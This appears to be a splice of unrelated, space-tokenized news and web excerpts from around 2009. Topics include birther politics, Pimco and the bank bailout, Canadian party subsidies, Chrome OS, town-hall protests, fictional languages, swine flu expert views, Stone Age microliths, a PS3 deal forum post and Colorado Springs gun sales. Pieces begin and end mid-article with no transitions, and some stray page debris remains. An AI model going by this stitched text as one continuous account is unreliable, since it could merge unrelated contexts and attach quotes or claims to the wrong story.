They may have no more credibility than the 9/11 truthers or those who denied the moon landings , but they certainly have more reach .
Second , however marginal they appear now , they were effectively running the country between 2000 and 2008 .
It was their birther logic ( an oxymoron if ever there was one ) that provided the mindset , legwork and frontline troops for the Bush era .
Iraq was invaded because it could not prove that it did not have something it truly did not have .
" We would say , ' Iraq should present any anthrax ' , " explained UN weapons inspector Hans Blix shortly after the invasion .
" While the US and UK were inclined to say , ' Iraq should present the anthrax . ' "
Guantánamo
Bay is still full of people who were incarcerated because they were not able to prove they were not guilty and whose guilt was to some extent inferred by their incarceration .
The birthers ' claims might be crazy .
But so was Whitewater , which ended with Clinton 's impeachment , and the Swift Boat saga helped torpedo John Kerry 's presidential campaign .
A senior Bush aide once ridiculed a New York Times reporter over his adherence to " the reality - based community " , which he described as people who " believe that solutions emerge from your judicious study of discernible reality " .
" That 's not the way the world really works any more .
We 're an empire now , and when we act , we create our own reality .
And while you 're studying that reality – judiciously , as you will – we 'll act again , creating other , new realities , which you can study too , and that 's how things will sort out .
We 're history 's actors … and you , all of you , will be left to just study what we do . "
This is what they do .
Even a brief study would show it is no laughing matter .
The twist , of course , is that the Obama administration has embraced the same public - private partnership proposal that Pimco has been pushing along and that Mr. Paulson briefly considered last fall .
Mr. Gross says that the Geithner plan is better because the government provides such generous debt financing .
Pimco is proud of its partnership with the government .
Mr. Erian points out that the firm ’s executives have been members of the Treasury Department ’s Borrowing Advisory Committee ( along with many other Wall Street executives ) for years .
Its current representative , the Pimco managing director Paul McCulley , says part of his job is to ingratiate himself with officials at the Treasury and the Federal Reserve so Pimco can better understand impending policy decisions .
He boasts that he is on a “ first - name basis ” with both Mr. Geithner and the Fed chairman , Ben S. Bernanke .
“ We have a whole lot bigger profile now than we did years ago , but the fact of the matter is we ’ve been doing the same thing in the last year that we ’ve been doing for the last 10 years , ” Mr. McCulley says .
“ I ’d like to think we ’re having some influence in the public policy arena .
And I say that first and foremost as a citizen . ”
Citizen  but also investor .
And some critics of the financial benefits that Pimco might snare if the P.P.I.P. gets rolling are quick to point out what Pimco stands to gain .
“ The critics would argue that all the benefits go to Pimco , ” says Representative Scott Garrett , Republican of New Jersey , who is a member of the House Financial Services Committee and a skeptic of the Geithner plan .
“ Well , maybe not all the benefits .
But they get the best ones right out the door .
And the taxpayers are on the hook . ”
The Obama administration says it will soon select lead fund managers for P.P.I.P .
It ’s almost certain that Pimco will be among them .
“ If you are trying to encourage investment from the private sector , is n’t it only logical to involve the most successful asset management organizations in the private sector ? ” says Thomas C. Priore , chief of ICP Capital , a boutique fixed - income investment bank .
And being selected by the government has other benefits , Mr. Priore adds .
“ If any endowment or public pension plan representative is looking for an asset management firm , he or she wo n’t get fired for hiring Pimco because , well , the government hired Pimco , ” he says .
“ That certainly enhances your franchise value . ”
Hey there , time traveller !
This article was published 23/8/2009 ( 4055 days ago ) , so information in it may no longer be current .
Opinion
OTTAWA --
When Prime Minister Stephen Harper 's attempt to cut off political party subsidies last year led to a very close brush with defeat , one might have thought the vote - tax debate would be dead and buried .
Think again .
It appears Manitoba cabinet minister Steven Fletcher has been tasked with promoting the idea all over again .
Fletcher -- the minister of state for democratic reform -- has been talking about gearing up to take on the vote tax again .
He has indicated it is something his government still plans to pursue .
" We believe that political parties should support themselves with people who voluntarily donate to whichever party they wish to support , " said Fletcher .
Last November , you might remember , Conservative plans to cut off the per-vote subsidy which parties get led to a near meltdown of Parliament .
The opposition parties accused the government of trying to use the threat of a recession to kill off its opponents by bankrupting them .
Then the Liberals , NDP and Bloc banded together to form a coalition and were prepared to vote down the government and take over .
Only Gov. Gen. Michaëlle Jean 's decision to grant Harper 's request to suspend Parliament kept the Conservatives from facing a confidence vote they surely would have lost .
So the fact Fletcher is bringing it up again has the tongues a - wagging .
There is likely one big difference , however .
A year ago , the Liberal Party was absolutely reliant on the money from that allowance .
The Liberals raised a little over $ 5.8 million in direct contributions but received $ 8.7 million in the per vote subsidy .
The Conservatives , in comparison , raised $ 21 million in donations and $ 10.4 million came from the vote tax .
Losing $ 10 million would hurt but they would still have had four times as much money as their nearest opponent .
But with a new leader , a new fundraising plan and at least the appearance so far of a wider appeal with voters , the Liberals ' financial fortunes have improved .
In the first two quarters of this year the Liberals already surpassed their 2008 fundraising totals , registering $ 5.9 million in donations with Elections Canada .
Added to that , with the Liberals ' 2008 elections showing so dismal , they are bringing in far less in the per-vote subsidy because they got 800,000 fewer votes .
In 2009 , they will raise $ 7.2 million in the vote tax subsidy .
If they raise another $ 4 million in the third and fourth quarters , they will no longer be as reliant on the vote tax money .
As well , the Conservatives cutting off the vote tax would not cripple the Liberals finances but would hamper the NDP and Bloc Quebecois , both of which earn more from the vote tax than from donations .
And that would be bad news for the Conservatives , whose victories are in part due to the splitting of votes on the centre - left of the political spectrum .
" ö " ö " ö
In 2000 , Premier Gary Doer had n't even celebrated his first anniversary as premier of Manitoba when he was tasked with hosting his fellow premiers at the annual premiers ' meeting .
Next summer , he will be celebrating his 10th anniversary as the province 's top dog , by bringing them all back again .
The annual meeting , at which premiers gather with their chief aides to try and reach a consensus on a number of issues including health care policy , trade , and disputes with Ottawa over federal funding .
But the event is almost as much about fun as it is function .
Every premier wants to showcase his province in its best light .
Doer got the ball rolling earlier this month by issuing the official invite to next summer 's extravaganza at the end of this year 's event in Regina .
He presented each of the country 's premiers with a package of Made in Manitoba movies : My Winnipeg , Capote , The Stone Angel , New in Town , and The Haunting in Connecticut .
I mean heck , if movie stars like Renée Zellwegger and Philip Seymour Hoffman come to Winnipeg to work , the premiers must want to come see what it 's all about too , right ?
The other tidbit of news about the meeting ?
Doer is hoping at least part of it might take place in Churchill .
Which is the height of beluga whale - watching season in the northern capital .
mia.rabson@freepress.mb.ca
The Los Angeles Police Department discovered an estimated $ 1 million in marijuana at a downtown commercial building that caught fire today .
Firefighters knocked down the structure fire that engulfed a one - story commercial building , but inside they found 1,000 pot plants as well as what appeared to be a plant - growing operation .
Several Los Angeles Fire Department trucks were called to the scene in the 600 block of South Santa Fe Avenue at 6:40 a.m. , department spokesman Erik Scott said .
It took 75 firefighters nearly 40 minutes to extinguish the blaze , Scott said .
No injuries were reported .
-- Raja Abdulrahim
Photo : Los Angeles city firefighters extinguish an early - morning fire in an industrial building in downtown L.A. Credit : Mark Boster / Los Angeles Times >>
More photos
Illustration by Jon Berkerly
IN 1996 , in one of his most celebrated phrases , Bill Clinton declared that “ the era of big government is over ” .
He might have added that the era of big companies was over , too .
The organisation that defined capitalism for much of the 20th century was then in retreat , attacked by corporate raiders , harassed by shareholders and outfoxed by entrepreneurs .
Great names such as Pan Am had disappeared .
Others had survived only by dint of huge bloodletting : IBM sacked 122,000 people , a quarter of its workforce , between 1990 and 1995 .
Everyone agreed that the future lay with entrepreneurial start - ups such as Yahoo ! — which in late 1998 had the same market capitalisation with 637 employees as Boeing with 230,000 .
The share of GDP produced by big industrial companies fell by half between 1974 and 1998 , from 36 % to 17 % .
Today the balance of advantage may be shifting again .
To a degree , the financial crisis is responsible .
It has devastated the venture - capital market , the lifeblood of many young firms .
Governments have been rescuing companies they consider too big to fail , such as Citigroup and General Motors .
Recession is squeezing out smaller and less well - connected firms .
But there are other reasons too , which are giving big companies a self - confidence they have not displayed for decades .
Big can be beautiful …
Of course , big companies never went away .
There were still plenty of first - rate ones : Unilever and Toyota continued to innovate through thick and thin .
And not all start - ups were models of success : Netscape and Enron promised to revolutionise their industries only to crash and burn .
Nevertheless , the balance had shifted in favour of small organisations .
The entrepreneurial boom was supercharged by two developments .
Deregulation opened protected markets .
Some national champions , such as AT&T , were broken up .
Others saw their markets eaten up by swift - footed newcomers .
The arrival of the personal computer in the 1970s and the internet in the 1990s created an army of successful start - ups .
Steve Jobs and Steve Wozniak founded Apple Computer in 1976 in the Jobs family 's garage .
Microsoft and Dell Computer were both founded by teenagers ( in 1975 and 1984 respectively ) .
Larry Page and Sergey Brin started Google in Stanford dorm rooms .
But deregulation had already begun to go out of fashion before the financial crisis .
The Sarbanes - Oxley act , introduced after Enron collapsed in disgrace , increased the regulatory burden on companies of all sizes , but what could be borne by the big could cripple the small .
Many of today 's most dynamic industries are much more friendly to big companies than the IT industry .
Research in biotechnology is costly and often does not bear fruit for years .
Natural - resource companies , whose importance grows as competition for resources intensifies , need to be big — hence the mining industry 's consolidation .
Two further developments are shifting the balance of advantage in favour of size .
One is a heightened awareness of the risks of subcontracting .
Toy companies and pet - food firms alike have found that their brands can be tainted if their suppliers ( notably , from China ) turn out shoddy goods .
Big industrial companies have learned that their production cycles can be disrupted if contractors are not up to the mark .
Boeing , once a champion of outsourcing , has been forced to take over faltering suppliers .
A second is the emergence of companies that have discovered how to be entrepreneurial as well as big .
These giants are getting better at minimising the costs of size ( such as longer , more complex chains of managerial command ) while exploiting its advantages ( such as presence in several markets and access to a large talent pool ) .
Cisco Systems is pioneering the use of its own video technology to improve communications between its employees ( see article ) .
IBM has carried out several company - wide brainstorming exercises , recently involving more than 150,000 people , that have encouraged it to put more emphasis , for example , on green computing .
Disney has successfully ingested Pixar 's creative magic .
You might suppose that the return of the mighty , now better equipped to crush the competition , is something to worry about .
Not necessarily .
Big is not always ugly just as small is not always beautiful .
Most entrepreneurs dream of turning their start - ups into giants ( or at least of selling them to giants for a fortune ) .
There is a symbiosis between large and small .
“ Cloud computing ” would not provide young firms with access to huge amounts of computer power if big companies had not created giant servers .
Biotech start - ups would go bust were they not given work by giants with deep pockets .
The most successful economic ecosystems contain a variety of big and small companies : Silicon Valley boasts long - established names as well as an ever - changing array of start - ups .
America 's economy has been more dynamic than Europe 's in recent decades not just because it is better at giving birth to companies but also because it is better at letting them grow .
Only 5 % of European Union companies born since 1980 have made it into the list of the 1,000 biggest in the EU by market capitalisation .
In America , the figure is 22 % .
… but size is n't really what matters
The return of the giants could well be a boon for the world economy — but only if business people and policymakers avoid certain pitfalls .
Businesses should not make a fetish of size , particularly if this means diversifying into a lot of unrelated areas .
The conglomerate model may be tempting when cash is hard to find .
But the moment will not last .
By and large , the most successful big firms focus on their core businesses .
Policymakers should both resist an instinctive suspicion of big companies ( see article ) and avoid the old error of embracing national champions .
It is bad enough that governments have diverted resources into propping up failing companies such as General Motors .
It would be even more regrettable if they were to return to picking winners .
The best use of their energies is to remove the burdens and barriers which prevent entrepreneurs from starting businesses and turning small companies into big ones .
I ’m collect some drawings which like a real photo , as you can see at first look they really like a real photo but if you look it again you can see some drawings there …
Google said the Chrome OS will be free to download and use Google has announced which hardware firms have pledged to build machines that will run its Chrome OS .
The search giant said it was working with many firms on Chrome OS hardware including Acer , Asus , Freescale , Hewlett - Packard , Lenovo , and Toshiba .
The software is designed to work with the web and Google said it was most likely to appear on smaller portable computers known as netbooks .
The browser - based operating system will be released to the public in 2010 .
Web futures
In a blog post announcing the hardware partners , Google said that the code for the Chrome OS would be open sourced in late 2009 .
Google said that the software will be free to download and use .
I 've been speaking to two firms planning to work with Google on the Chrome OS , one very cautious about its prospects , the other more enthusiastic
Rory Cellan- Jones
BBC 's technology correspondent
Read Rory 's thoughts in full
The first netbooks that can run the software will be ready in late 2010 .
Since Asus launched the first netbook the cut - down computers have proved hugely popular .
Analyst firm Gartner predicts that 80 % more netbooks will be sold in 2009 than sold in 2008 .
However , so far , the small computers only make up 8 % of the total PC market .
The Chrome OS will be designed to work with Intel chips that appear in the vast majority of desktop PCs , laptops and netbooks as well as the Arm chips that power most of the world 's mobile phones .
Texas Instruments and Qualcomm , who both build devices based around Arm chips , were also unveiled as partners on the Chrome OS project .
In a blog post announcing some of the hardware partners , Google also said it was working with Adobe on the operating system .
This could turn out to be significant because of the wide use of Adobe 's Flash software .
Flash is used to power many multimedia websites but Adobe has been working hard to extend its capabilities via the Air technology and make it more web - centric too .
Microsoft is developing its Silverlight technology to do a similar job .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
“ I ’m not going to get into that , ” she said .
“ It creates a real sour atmosphere at the door . ”
And lawmakers are learning the hard way to watch their tongues .
At one of his constituent sessions last week , Representative Todd Akin , a Missouri Republican who opposes President Obama ’s health plan , remarked that some of his colleagues “ almost got lynched ” at their town halls .
His sympathetic audience laughed and clapped ; Mr. Akin replied , “ I assume you ’re not approving lynchings , ” and made a choking gesture .
The clip quickly turned up on YouTube , and now the chagrined congressman faces accusations that he was making lynch - mob jokes about Democrats .
Image HEARD
In Mehlville , Mo. , last week .
Credit ...
Dawn Majors / St. Louis Post - Dispatch , via Associated Press
“ I was recognizing the atmosphere as opposed to condoning it , ” he said in an interview on Friday .
Given the “ aggressive atmosphere , ” he said , he is turning to the telephone conference as a way to take questions from constituents .
“ We ’re adjusting our format to the situation , ” he said .
In some respects , last week ’s town halls  fueled on the right by antitax groups backed partly by industry , and on the left by unions  are the logical outgrowth of decades of American political activism .
Community organizing is nothing new ; President Obama made an early career of it .
The civil rights movement , the antiwar movement , the anti-abortion movement , the rise of the religious right  all grew out of grassroots campaigns conducted by methodical organizers .
Accusations of phony grassroots campaigns 
“ Astroturf , ” in Washington argot  also are not new .
When Richard Viguerie , the conservative strategist , pioneered the use of direct mail to raise money in the 1970s , he quickly came under attack for creating “ the impression of a mass uprising when there were organizers behind it , ” said Julian Zelizer , a historian at Princeton University .
But last week ’s “ town brawls , ” as the news media dubbed them , do seem to represent a shift .
Instead of each side ’s holding rallies and protests , the activism seemed directed personally at lawmakers , with the aim of overwhelming them .
Mr. Kratovil , the Maryland Democrat , opposes the health care legislation moving through the House .
But he was unable to get his point across , he said .
“ They simply want to yell when you talk . ”
Some might call it democracy in action , but there is a risk .
If the pattern continues , lawmakers could grow suspicious , refusing to believe that their encounters with voters are genuine .
“ When a politician ca n’t tell what ’s grassroots and what ’s Astro , that ’s dangerous , ” Mr. Zelizer said .
“ In the long term , that could undermine the potential of grassroots mobilizers to change things .
At a certain point , it ’s crying wolf .
No one is going to believe it ’s real . ”
J.R.R. Tolkien flipped readers ' wigs with his penchant for inventing new languages , but since then it has become almost de rigueur for fiction writers and moviemakers to include a constructed language ( conlang ) when crafting a new universe .
Here are some of the best :
10 . Esperanto
Invented in 1887 , this real - world language is sometimes employed in movies to suggest a future language of humanity .
Science fiction flick Gattaca and cult fave Red Dwarf employ the language as a background color ( e.g. , loudspeaker announcements and signs ) while Whistler in Blade : Trinity has an entire conversation in Esperanto .
The language gets additional geek cred by the fact that William Shatner starred in 1965 horror flick Incubus , the only mainstream wholly Esperanto movie ever released .
9. Fremen
Next to Tolkien , it 's hard to beat Frank Herbert when it comes to the amount of background info he generates when writing a story .
Dune 's appendices blew my mind as a young nerd and motivated me to create excessive backstory in my own experiments with fiction .
As with Tolkien , Herbert drew liberally from real - world cultures for his universe .
Fremen is no exception , serving as a descendant of earthly Arabic , lending the Fremen people a dervishlike feel .
8. Qwghlmian
From Neal Stephenson 's Cryptonomicon novel and Baroque Cycle trilogy , this fictional language allegedly hails from obscure British islands .
It has 16 consonants and no vowels , making it ideal for representing binary information , as well as making it nearly impossible to pronounce .
You really have to read the books to get more of a sense of the language – like all things Stephensonian , he presents an overwhelming amount of information and leaves it to the reader to decode it all .
7. Vampirese
An ancient vampire language from the Blade movies .
The most noticeable aspect of this language are the glyphs , symbols tattooed on grunts to show their allegiance and drawn in UV ink defining the boundaries of various vampires ' territories .
There 's even a vampire holy book written in the language , the Book of Erebus , featured in the first movie .
6. Gelfling
While the Gelfling language is mentioned only briefly in The Dark Crystal , we nevertheless get a tantalizing glimpse of this lost culture .
What we do know is that the long - dead ancient Gelflings who got wasted by the Skeksis left behind ruins covered in beautiful hieroglyphs , which apparently only male Gelflings can read .
Yeah , well , the females get wings !
5. Sindarin
While Tolkien created several languages for his various Lord of the Rings books , Sindarin , the language of the elves , is not only his most beautiful but also his most fully realized invented language .
Typically , Tolkien and his language - nerd adherents have developed the tongue 's grammar and orthography to almost headache - inducing levels .
4. Huttese
The Star Wars canon ( as well of a plethora of non-canonical writings ) describe the Hutts as being an ancient race of merchants who once dominated the galaxy but now have become mere gangsters .
We first got a taste of Huttese in Return of the Jedi , where it was described as the " court language " of Jabba the Hutt .
That tiny taste of Hutt culture has been expanded in subsequent novels and videogames , giving us a clearer picture of this rotund race .
3. R'lyehian
Pretty much everything about the Cthulhu mythos ( introduced in the classic Lovecraft short story The Call of Cthulhu is designed to drive ordinary mortals mad , and the otherworldly language R'lyehian is no different .
Indeed , it 's barely speakable : ph'nglui mglw ' nafh Cthulhu R'lyeh wgah 'nagl fhtagn ( In his house at R'lyeh dead Cthulhu lies dreaming ) is the classic R'lyehian phrase that alludes to the godlike monstrosity and his bizarre , non-Euclidean city .
2. City Speak
" That gibberish he talked was city speak , gutter talk , " Rick Deckard intones in the non-director 's cut version of Blade Runner .
" A mishmash of Japanese , Spanish , German , what have you . "
The concept of a ' common tongue ' has been enshrined in science fiction and fantasy literature forever , but this execution was effortless and brilliant , adding color to the movie without making a big deal out of it .
1. Klingon
Perhaps the most fully realized science fiction language , Klingon has a complete grammar and vocabulary , permitting countless nerds to learn it like it was high school Spanish .
Fans have translated Shakespeare , Sun Tzu and the Bible into the language .
There 's a Klingon Language Institute , the purpose of which is to promote the language and culture of this nonexistent people .
You can even select Klingon as your language of choice in Google .
So there you have it , 10 geeky made - up languages .
But what did we miss ?
Add your suggestions to the comments field .
Sugarholics
Harpoon posted this video of Jack Lalanne last month .
I liked it so much I had to repost it here for Mark ’s Daily Apple readers .
Jack ’s challenge is as valid as ever .
If you have n’t already , cut all refined sugars out of your diet and “ you will be thanking ( Jack ) for the rest of your natural life . ”
He promises .
Further Reading :
Obesity is Not Your Fault
What is Overweight ?
Smart Alternatives to Tempting Junk Foods
Do n’t Just Survive , Thrive
Subscribe to Mark ’s Daily Apple feeds
About the Author
Post navigation
If you 'd like to add an avatar to all of your comments click here !
The 1918 Spanish flu pandemic was caused by an H1N1 form of influenza A With the UK confirming two cases of swine flu and the World Health Organization raising its alert level from three to four , how serious a threat does the disease pose to us all ?
WHO says the virus , which has killed an estimated 150 people in Mexico , is showing a " sustained ability " to pass from human to human and is able to cause community - level outbreaks .
The UK 's leading experts on flu give their views on what the future threat might be .
PROFESSOR NEIL FERGUSON , WORLD HEALTH ORGANIZATION
Clearly we are on track for a pandemic in the coming months .
The good news is that we were all worried about so - called bird flu H5N1 which was a much more dangerous virus .
Here , we are not in the same ball park .
We might expect up to 30 - 40 % of the population to become ill in the next six months if this truly turns into a pandemic
Professor Ferguson
But we can't at the moment answer the question is it comparable to 1918 Spanish flu which killed a lot of people - or is it much more like Hong Kong flu .
We are coming out of the normal time of year when we have flu circulating in the UK so we do n't really know what size of epidemic there may be in the next couple of months .
It is almost certain that even if it does fade away in the next few weeks which it might we will get a sizable epidemic in the autumn .
We might expect up to 30 - 40 % of the population to become ill in the next six months if this truly turns into a pandemic .
We could get substantial numbers infected in the next few weeks .
If I was to be a betting man I would say it would be a slightly longer period of time just because we are heading into the summer months .
SIR LIAM DONALDSON , CHIEF MEDICAL OFFICER FOR ENGLAND
A new strain of flu is something to which we do not have natural immunity , and we have not been vaccinated against , because there is not a vaccine , so it does mean that many more people are vulnerable and so it spreads more easily and affects more people .
But we do n't know enough about this virus yet .
It is being studied by the top laboratories in the world .
When we know more about it we will be able to give better predictions about who is at greater risk , and who is at risk of developing serious complications .
At this point the picture coming out of Mexico is rather confused , and we can't make any firm statements about what is likely to happen , but we have to prepare for all eventualities .
PROFESSOR JOHN OXFORD , VIROLOGY EXPERT AT BARTS AND THE LONDON
If the avian flu H5N1 virus had spread from human to human like this then I would be extremely worried .
It would be top of my Richter scale .
But this swine flu worries me less because as a population we have a basic immunity to H1N1 .
Outside of Mexico there have been no deaths , so it does n't seem so aggressive .
And not only are we coming up to the summer , which makes it less likely for these viruses to spread as well , but Britain has enough antiviral drugs for half of the population .
So we should not panic in any way .
This does not look as though it is going to be a virus that sweeps the world and causes huge mortality .
DR ALAN MACNALLY , MOLECULAR BIOLOGY EXPERT AT NOTTINGHAM TRENT UNIVERSITY
I still think we are a day or so away from knowing what the threat is .
WHO has gone to stage four , so we know there will be an epidemic stemming from direct contact with these cases in Mexico .
We will see more cases .
But we will have to wait to see how it spreads to know if there will be a pandemic that sweeps nations .
The key thing is how lethal a virus is it .
Outside of Mexico it has not caused any deaths , which is good news .
And we are prepared for it .
We should have a complete picture in the next five to seven days to answer these questions .
KEITH PLUMB , FELLOW OF THE INSTITUTION OF CHEMICAL ENGINEERS
There is no evidence of pandemic in Europe at this point in time but should the threat increase , the UK has a wealth of scientific and engineering expertise which can be deployed to ramp up the countermeasures necessary to protect the population at large .
Let 's keep things in perspective .
This is not 1918 ; and with over 30 million doses of antiviral treatments , effective against H1N1 available in the UK right now we are well placed to combat any outbreak .
We should also bear in mind that there are two flu-vaccine manufacturers in the UK ( Novartis and Medimmune ) and whilst there may be capacity issues , both companies are technically capable of producing appropriate vaccines .
PROFESSOR HUGH PENNINGTON , LEADING BACTERIOLOGIST
It 's a new virus - we 've never before seen this combination of swine virus and human virus genes .
It 's very difficult to make any predictions when it 's not like any flu virus before .
If there are no more cases in the next couple of weeks then we can maybe say with reasonable confidence that we 're out of the woods .
But the flu virus is a pretty awkward customer and you have to be very circumspect .
I do n't think the public health authorities will be giving the all - clear for some time yet .
PROFESSOR ANGUS NICOLL , EUROPEAN CENTRE FOR DISEASE PREVENTION AND CONTROL
We have a very confusing picture coming out of Mexico .
We are not aware of how many people there are with mild infections out of Mexico .
It may be that those few deaths represent just the tip of an iceberg which is a lot more much milder infections .
Therefore we feel that one should not be looking at Mexico and saying that is the pattern we will necessarily be following in Europe .
We do know from previous influenza viruses and previous pandemics that what you see at the start is not necessarily what you see six months , a year or two years later .
Sometimes you get a second or third wave which is more vicious than the first .
As a region , Europe - and particularly the European Union - is better prepared than any other part of the world .
Unfortunately you can never prepare well enough .
We are beyond the stage of being able to contain the virus , we can only mitigate it and there is still more work to be done - and a cool summer would give us time to do some additional work .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Technological innovations have enabled human cultures to thrive , and now researchers have discovered what might be the oldest example known so far of such an occurrence .
These ancient innovations are in the form of miniature stone blades , which appear to have contributed to a population boom in south Asia .
Recent genetic research of people across the globe suggests that roughly 45,000 to 20,000 years ago , one of the most dramatic population booms after humanity dispersed from Africa occurred in southern Asia , leading to " the highest population densities in the world in prehistory , " explains Michael Petraglia , an archaeologist at the University of Oxford in England .
After studying mitochondrial data from people in India and neighboring regions , Petraglia and archaeologist Ravi Korisettar of Karnatak University in Dharwad , India , and their collaborators refined the timing of this population boom to between 35,000 and 28,000 years ago .
" Why this population expansion happened is a bit of a mystery , " Petraglia says .
To investigate both the potential causes and effects of this population boom , Petraglia and his colleagues scoured existing archaeological evidence in south Asia .
They found that whereas 153 sites of human occupation were found dating back to the middle Paleolithic , or roughly 300,000 years ago , past studies had uncovered some 400 sites dating back to the late Paleolithic , or about 40,000 to 10,000 years ago .
The researchers suggest the greater number of late Paleolithic sites support the genetic suggestions of a population boom .
After delving into a site at Jwalapuram in southern India , which has preserved artifacts spanning the past 78,000 years , the scientists also discovered signs of technological innovation at roughly the same time as the population boom .
Until 38,000 years ago , blades made of stone flakes were squat or relatively large .
But afterward a new kind of blade came to the forefront — small , elongated " microliths " just four centimeters in length or less , with triangular , crescent or trapezoidal shapes .
Similar findings were seen during the population boom at the Patne site on the west coast of India and at the Fa Hien Cave site in Sri Lanka .
Microliths , which might have been parts of barbed weapons , " were a key innovation , " Petraglia explains , which until now were thought to have emerged in southern Asia only 10,000 years ago .
" The fact that they are light , portable , versatile and straightforward to replace is quite an improvement over prior technologies — you can make hundreds of them quickly and repair your spear or arrow very quickly , making them easier to maintain .
In earlier periods , if you lost or broke your stone tool , you would have to invest a lot of time and effort in remanufacturing one . "
The advance in technology might have helped burgeoning human populations make the most out of the environment , Petraglia speculates .
The researchers also found that while populations were expanding and technology was improving , the environment in south Asia was deteriorating — climate shifts cut down on monsoon rainfall , leading to growing deserts with pockets of rich , diverse resources .
Technological innovations could have helped catch more food in those tough times , allowing people to thrive , despite the environmental challenge .
Petraglia notes , however , that cause and effect is extraordinarily hard to determine here , if not impossible .
For instance , the environmental downturn could have forced humans to live closer together to make use of resource clusters .
As populations grew , more complex technologies were likely to persist , suggests prehistoric archaeologist Lawrence Straus at the University of New Mexico in Albuquerque .
" You could have had Leonardo da Vinci 50,000 years ago inventing technology , but if there are n't enough people around to carry on the ideas , the invention would die with him , " he explains .
These new findings , published this week online by the Proceedings of the National Academies of Science , are an important key to the puzzle of how technology emerged as humans dispersed across the globe , says archaeologist Ofer Bar - Yosef at Harvard University , who , like Straus , did not participate in this study .
" We see microlith blades in the Near East going all the way to central Asia and Siberia at exactly the same time , but not in Southeast Asia and south China and New Guinea and Australia , so something changed after they reached India , and we 're struggling to understand why , " he explains .
" We now see them in India at this time , which back then was dry , with similar landscapes to other places such as in Africa or the Near East , where we see microliths then .
But in Southeast Asia and New Guinea , you 're back in tropical forests , so it 's possible that we do n't see microliths there because of an adaptation to the environment or due to lack of suitable raw materials for making them . "
Posted 29 August 2009 - 03:18 AM
Just found a pretty awesome PS3 Slim deal .
Basically , you can get a PS3 slim from Buy.com on eBay and thus take advantage of tax free and 10 % off .
To do it simply search Bing.com for Playstation and click the eBay link advertising cashback .
From that link you should be taken to the eBay homepage and there should be a Cashback icon around the top middle of the page .
Then go to item # 400070170420 .
Buy PS3 for $ 299 no tax or shipping .
During the confirmation of buy it now you should see several Cashback references , and the final page should show $ 30 eligible cashback .
Pay with Paypal .
Receive $ 30 back .
Profit .
This is likely to be the best Slim deal this holiday season , and is a good replacement for Newegg and Sears and others that have died .
UPDATE : Cashback has already appeared for me , $ 30 bucks saved , so I can confirm this works with this item and method .
Edited by yodagonemad , 30 August 2009 - 04:05 PM .
Guardian Media Group today reported major losses of almost £ 90 m as it complained that its national newspapers and websites were operating in the " toughest trading conditions seen for many years " .
The group 's regional newspapers suffered plunging profits while the radio business made a significant loss .
Download the new Independent Premium app Sharing the full story , not just the headlines
In its annual report for 2008 - 2009 , GMG , which publishes The Guardian and The Observer newspapers , reported a pre-tax loss of £ 89.8 m , compared with a profit last year of £ 306.4 m , on turnover which was down to £ 405.4 m compared with £ 502.1 m .
Guardian News & Media , the group 's national newspaper division , reported an increase in operating losses to £ 36.8 m , compared to £ 26.4 m in 2008 , on a reduced turnover of £ 253.6 m compared with £ 261.9 m .
Despite the losses , the GNM editor - in - chief Alan Rusbridger received an 11 per cent rise in salary to £ 445,000 for the year to 29 March .
Rusbridger said in April that he would take a 10 per cent pay cut this year .
The GMG chief executive , Carolyn McCall , took a 39.7 per cent pay cut last year , receiving a total package of £ 498,000 .
Her salary was £ 472,000 and her benefits totalled £ 26,000 .
The previous year she received a total of £ 827,000 , including a salary of £ 424,000 and bonus of £ 385,000 .
Yesterday McCall said : " The sharp decline in the advertising market had an impact on each of the wholly owned businesses .
All are reducing costs to a more sustainable level in this harsh new environment . "
GMG 's 2008 profit figures were inflated by the one - off proceeds from selling a 49.9 per cent of Trader Media Group , publishers of Auto Trader .
That joint venture , in which GMG retains a 50.1 per cent share , is the group 's most profitable arm with an operating profit of £ 110.8 m ( compared with £ 119.9 m in 2008 ) on turnover of £ 296 m ( £ 309.9 m ) .
The local newspaper division , GMG Regional Media , which includes the Manchester Evening News , saw operating profit down to £ 0.5 m ( from £ 14.3 m in 2008 ) on turnover down to £ 94.5 m ( from £ 120.5 m ) .
GMG described the current market as " the most challenging in the history of the local and regional press " .
GMG Radio , which includes stations such as Smooth and Real Radio , posted an operating loss of £ 6.6 m ( compared with £ 0.1 m profit in 2008 ) on turnover of £ 46.6 m ( £ 48.8 m ) .
This conservative city is taking an unusual , some might say extreme , step to try to stem its fiscal woes :
It ’s entering the gun business .
The Colorado Springs City Council is expected in coming weeks to approve the final details of a program that would allow the Police Department to sell confiscated firearms to federally licensed gun dealers .
Police have already stopped melting down the hundreds of guns they collect from crime scenes , drug houses or civilians who do n’t need them anymore .
The sales are projected to bring in about $ 10,000 a year , only a slight dent for a city that faced a deficit of one - quarter its $ 200 - million annual budget this year .
But it still helps , said Vice Mayor Larry Small , who proposed the gun sales .
“ Every penny counts , ” Small said .
Advertisement
Colorado Springs is home to the Army ’s Ft. Carson , the Air Force Academy and NORAD .
Men and women in uniform mingle easily with civilians in the shopping centers and strollable downtown that sits in the shadow of 14,000 - foot Pikes Peak .
People here are comfortable around firearms .
But even in Colorado Springs , the idea of law enforcement as gun sellers has raised some eyebrows .
The Police Department objected , only to be overruled by the council , which in February voted 8 to 1 to direct the department to draw up the program it will consider this month .
Lt. David Whitlock said the Police Department has been moving cautiously to address the many concerns the sales raise .
“ There ’s all kinds of ancillary issues , one of which is the politics of being in the gun-selling business , ” Whitlock said .
“ The other is not introducing another weapon into the community . ”
Advertisement
Jan Martin , the lone council member who voted against the sales , said the small amount of money they could bring in is outweighed by the risk that a gun sold by the city could one day be used for a crime .
“ I remember what some of those weapons were used for , ” Martin said .
“ Just the idea of putting those weapons back on the street is unconscionable . ”
The International Assn. of Chiefs of Police cautions against law enforcement agencies selling weapons they have seized .
Destroying the firearms , it says , is a better policy .
No one tracks the number of agencies that make sales , but officials believe it to be very small .
Nonetheless , Scott Knight , who helped formulate the association ’s policy on gun sales , said , “ We understand , particularly in this economy , that some departments need to recoup budget losses . ”
Advertisement
Knight ’s police department , in Chaska , Minn. , about 20 miles southwest of Minneapolis , is one such agency .
The department upgraded its rifles recently and the only way to pay for the guns was to sell the old ones to licensed firearms dealers .
“ I certainly was not willing to turn those over to the public , ” Knight said .
In El Paso County , which includes Colorado Springs , Sheriff Terry Maketa ’s agency has been selling confiscated firearms to licensed dealers since 2006 .
Spokeswoman Lt. Laurie
